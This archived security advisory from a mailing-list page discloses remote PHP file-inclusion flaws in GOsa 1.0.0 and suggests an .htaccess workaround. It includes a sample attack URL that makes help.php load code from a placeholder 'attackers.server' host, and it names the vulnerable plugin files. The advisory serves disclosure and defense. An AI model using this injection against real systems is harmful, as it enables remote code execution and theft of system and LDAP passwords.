| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3E593A86.B3D6A287@bsquad.sm.pl> From: appelast at bsquad.sm.pl (Karol Więsek) Subject: GOnicus System Administrator php injection -----BEGIN PGP SIGNED MESSAGE----- I. BACKGROUND The GOnicus System Administrator is a PHP based administration tool for managing accounts/systems in LDAP databases. Project homepage : http://www.gonicus.de II. DESCRIPTION A remote attacker can inject into GOsa arbitrary PHP code that executes under the privileges of the underlying web server. There are serveral places, where by modifying several variables attacker could execute arbitrary PHP code. By setting plugin variable in following files attacker could include remote files and execute them as a PHP code : plugins/3fax/1blocklists/index.php plugins/2administration/6departamentadmin/index.php plugins/2administration/5terminals/index.php plugins/2administration/4mailinglists/index.php plugins/2administration/3departaments/index.php plugins/2administration/2groupd/index.php The same situation exists in include/help.php where we could set base variable as a remote host and include remote file. The following is a sample attack URL that would cause "target.server" to load include/common.inc from "attackers.server". http://target.server/include/help.php?base=http://attackers.server/ GOsa doesnt' support "register_globals off". III. ANALYSIS Remote exploitation allows an attacker to execute arbitrary commands and code under the privileges of the web server. This also opens the door to privilege escalation attacks. Attacker could also debug httpd child processes and grab secret information like users system passwords, LDAP passwords. IV. DETECTION GOsa version 1.0.0 ( current ) is confirmed vulnerable. V. Workaround Temporary solution is to enable apache .htaccess authentication in all subdirectories containing .php files, which are included, not accessed directly. Example .htaccess file AuthType Basic AuthName koza UserAuthFile /dev/null require valid-user - -- Karol Wi?sek [appelast-at-bsquad.sm.pl] http://bsquad.sm.pl/ "Knajpa: miejsce, dok?d si? co wiecz?r chodzi po raz ostatni w ?yciu." -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 Comment: Bear Software, LLC, http://bear-software.freeservers.com iQCVAwUBPlksdkKKOIVhErCVAQEeaAP+PBSWgy6Dealk+B3nNEmTQnsOzgUUuDd+ KNAapeZmyyzmsHR+BmCAiKLICtau+3OivQbRyhuIjh/I1oXrmFRDSdZVEWaau6c4 peTHhoHaTEbOpn4Wuc0D1axJhaeCboc1syOY3sss/U8cd+jEz7wQgBvWRcbmR02H VhwGjAjsVm8= =TYVx -----END PGP SIGNATURE-----
Powered by blists - more mailing lists